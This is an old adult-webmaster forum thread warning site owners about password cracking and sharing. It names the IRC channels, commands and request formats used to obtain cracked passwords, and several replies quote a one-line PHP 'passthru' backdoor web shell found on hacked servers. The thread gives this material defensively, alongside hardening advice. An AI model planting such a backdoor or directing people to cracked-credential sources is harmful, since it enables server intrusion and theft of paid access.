How easy is it to get a password to just about any pornsite?
 

How easy is it to get a password to just about any pornsite?

Very FUCKING easy!

In this thread I will attempt to get webmasters to actually do something about their BW and customer service costs.

I bet you webmasters don't even realize just how many passwords are given out in a day. If you did, I am sure you would do something about it. I hear it all the time, "We actually give out passwords to 'password boards' to have them fail in a few hours and try to get people to buy based on the 401 error page and popup consoles)." What you don't realize is that most people don't get passwords from fake password boards.

Surfers are not stupid anymore. First we will look at one of the oldest technologies, newsgroups. Go to your favorite reader and plug into alt.sex.passwords, a newsgroup that has been giving out passwords since before there was an internet (it used to give them out for subscription porn BBS's). Here you will see anywhere from 10's to 100's of passwords given out daily. Just request one and see how fast you get a reply.

Next we can go to the IRC. Another old technology. Get where we are going? You guess it (maybe), Alt.Sex.Passwords again ;) . This time we go to www.mirc.com and download the latest copy. Then load it up and login to thundercity.net. Perhaps the easiest way is this command:

/server irc.thundercity.net

Then /join #asp

Now you can make a request in this format,

!request http://members.url.com/members_area (billing_company)

Someone is going to crack you a password in 0 seconds to 1 hour or so. I said 0 seconds because someone might have cracked a ton of passwords for your site already. When someone does this, they usually setup a script to automatically fill your request.

Now you are thinking, "So fucking what, I have the most leet password management scripts known to man (or woman). They will block these fuckers!" Sorry, but no, they won't. Why not? Because AOL sucks balls, that is why! You had to set it do that 3 to 5 people can use a password with the same IP and the AOL modem/ADSL users can use your service without getting blocked. "Right." you say, "But these people are giving the same passwords to multiple people every few minutes, they WILL get blocked!" Wrong, I say... If you have two systems at your work space, ask for the same password from each different machine. Someone will crack you 2 different passwords... And the other 30 people? They will get 30 different passwords... It is actually "bad etiquette" for a cracker to give the same password to 2 people within 2 hours time.

Most people who sign on to the IRC don't use proxies. Infact, IRC networks try to make it really hard to do so. So you can watch someone get one of your passwords and then see what happens in your logs. Or better yet, watch for a 1 hour period. Say 20 people ask for your site in that time frame. Then also keep track of legit users in the same time frame. GREP your logs for their IP's and see how much BW they are using. Compare it to the BW the legit users are using. Is it 20%? 25%? 50%? more?

See how many passwords get blocked. Do any? If 5 do, then do the legit users cancel them or chargeback instead of getting them reactivated? Does the customer service agent make them feel like suspects (password sharing) instead of victims (password cracking)? Do they reset the password with the same password so this happens again?

OK.. now let's try a password forum.

http://www.xxxhq.com/vb/index.php

Here you will find passwords that people have cracked and posted. You can usually find working passwords for your favorite sites. The major problem with this method is that you are going to have upwards of a 100 people try a password at the same time. Killing it. It is common that if you post 200 passwords for a big site like [insert_your_idea_of_a_big_site_here], the passwords will die en'masse. Why is this a problem? Because it is a customer service nightmare when 200 passwords are killed in 2 hours. 1 to 5 chargebacks? 10 to 20 cancels? 5 to 30 refunds? I dunno. I don't run a program, but I am sure you see numbers somewhere near these. Resetting the remaining 150 passwords = fun? I didn't think so.

I didn't write this to give GFY surfers a free ride. I wrote it to let you know that you all have problems in some form... Well, 95% of you do. How can you fix this shit? First, use a form login. Crackers HATE form logins. Basic Authentication (the grey popup) can be cracked at speeds as high as 150,000 tries per hour. Forms are about 8,000 to 25,000. No one wants to do them.

But people WILL, IF THEY HAVE TO. So you need something even better. So you need a security code. Not a run-of-the-mill one either. The numbers and letters need to mix with their backgrounds so that there is little contrast. A program named Caecus can read the run-of-the-mill ones pretty easy, but it relies on contrast to do so. Skewing the numbers and letters also helps.

Now you have 1/2 of the battle won. Finding working passwords is a bitch for a cracker now. But what about the hacker? They are still getting in and getting passwords. To combat them you need to properly create and secure passwords.

#1, Make your own passwords. Do not let a user choose their password, ever. These passwords should be made out of both upper and lowercase letters and with numbers. They should be 8 characters in length.

#2, NEVER store unencrypted passwords on the server. NEVER EVER! If you generate your own passwords and a hacker steals the unencrypted ones, you are screwed.

#3, Store passwords in a bitchy format like MD5. MD5 passwords can be cracked at about 5,000 c/s and DES can be done at 150,000 c/s or more. Which one is the better choice?

Now assuming you followed rules 1, 2 and 3 you have the other 1/2 of the problem fixed. Now even if a hacker steals your DB, they have passwords that they cannot crack. But what if a customer forgets their password? Simple, write a script just like the one that resets your password here at GFY.

Still not thinking the problem is HUGE? ( -m allows you to connect to another server without disconnecting from the current one.)

/server -m mesra.kl.my.dal.net
/list xxx

then,

/server -m mesa.az.us.undernet.org
/list xxx

I could go one but I think you will quickly see just how much of a pain in the ass this kind of password cracking is.

This is also a call to programmers. If you can offer solutions like the login script or password reset scripts, reply here! Offer your services. I am sure there are about 3,000 websites that need them.

http://www.bettercgi.com/strongbox/

Problems solved.. :)

No fucking doubt man.

High times can i buy your sig for 300/month ?

:1orglaugh :1orglaugh :1orglaugh



:pimp :pimp :pimp

Nice solution. Got a site it is on so I can check it out?

www.arikaames.com

Can you afford it?

For 6 psts he is really knockin out some great BS and Misinformation.

But hey it's always fun to forget everything ya know...
Lets enjoy the fantasy.

No doubt.

no actually i can't i was gonna ask newbreed to pay the upfront cost, and then since your sig will get clicked so much that i'll split the proffit with him :thumbsup

pennywize has done wonders for us.

Nice. The one flaw is that this is fixing the 1st half of the problem. The crackers. They cannot get in. You still need to work on the hackers. Also the site allows the users to generate their own passwords. If the website itself is ever hacked, then a hacker will have an easy time decrypting them.

HT, go back to smoking herb, you appear to be better at that than posting here.

SOS, does he have a sig yet? If so, what an embarassing mistake by any company who would let him link up.

thats a very good point... i think you should email the pentagon and let them know that if their site gets hacked they are vulnerable once the hackers are inside

:1orglaugh :1orglaugh :1orglaugh :1orglaugh

The clueless ones are always the best!!!!!!!! :thumbsup

Anything can be cracked and hacked...
Big Whoooop

Tell us somthing new, are you waisting any talent you have just to get into a porn site?

Let us know when you can Crack IBILL to find out exactly whats going on.

did you know if hackers got into your server, that its bad?

Now I know how Jesus felt...

Pretty much all who have posted are sheep. I think that is obvious.

If a hacker steals your DB and cannot use the DB then you have still won. If you are too thick to realize that then you are a sheep.

Example,
The lastest cracked passwords on ASP... Perfectgonzo creates the users password. They also use a kickass login script and password management script. But it is painfully obvious that it didn't even make a lick of difference. They stored the passwords unencrypted on their server and now the hackers give those out. They also backdoored the server with <? if(isset($cmd)) { passthru($cmd); } ?> scripts. So they can get todays updated working list.

You can call me scum, poser or whatever you'd like. The truth is I know more than you probably ever will and for some reason that scares you more than the knowledge you'd gain by listening.

good thing you posted a screenshot of peoples passwords being given out.... you know... because the reason you got flamed was because we didn't believe that passwords were being cracked

:thumbsup

i should probably mention that i was being sarcastic

Wow, someone actually addresses a real issue on GFY and look at the responces...

That's just sad...

K...

Right about now I am waiting for the sales pitch...

Password problems have always been a problem since day one.
What your saying is really umm...

Nothing new...
So what are you selling?

Good post HT.

Fuck the haters

I am not selling anything. Not a service. Not a device. Not a piece of software.

I am simply telling you the three things you need to be smarter and to STOP being cracked/hacked for passwords.

Form with security code.
Server made passwords (8 characters minimum).
Stored encrypted with MD5 or something else equally hard to crack.

everyone i've talked to who has used strongbox doesn't have a problem with their passwords being distributed over irc / password forums / etc etc

PHHhhh...

THanks you waisted my time...

HightTimes I like ya already.

Ya got "That Aggression" turn it into cash:)

all my sites are protected strictly with iprotect, server made 10 character alpha numeric passwords and encrypted on a seperate server with MD5....:)

Run this in the home directory of your websites.

Example,

/home/sites/website1.com
/home/sites/website2.com

Run it in /home/sites so that it covers them all... If you find a script that resembles the one I posted previously, you've been hacked.

Well I guess that was the silver nail that was drove home in the casket, no replies for a while now.

Backdoor scripts,

High_times i'm just curious.. what paysite do you run ?

netstat -a|grep LISTEN

Is someone running an IRC botnet on your BW and server? Running a backdoor to get on later?

grep ahh I remember cisco's protocals =)

HT... Most sites don't get hacked, sites like perfectgonzo didn't get hacked. The pw leaks are from brute force attacks. No protection software can stop the attacks 100%.

I will not get into what I do in the adult industry because I'm become an obvious target for hackers ;)

BTW, they really like the thread tracking services since they allow the hackers to stay up to date on what you are doing to stop them.

I know they did get hacked. I know how they got hacked. I won't spell it out here. You can easily find it by surfing the link to their join page. Dammit... well, I gave some of it away.

Actually that is a UNIX shell command.

why are you more a target then anyone else?

Ask yourself why certain webmasters catch hackers red handed and then never turn them in? Why hasn't the LA Times printed a story about every single MPA2 customer getting hacked? Why not a story about add-passwd.cgi being hackable before the check for WNU.com's IP? Why not a story about CCBILL leaving the logs directory world readable by default?

Because no webmaster wants retrobution from hackers who read the story and then say, "Ohh, you thought that was cute? Wait until this..."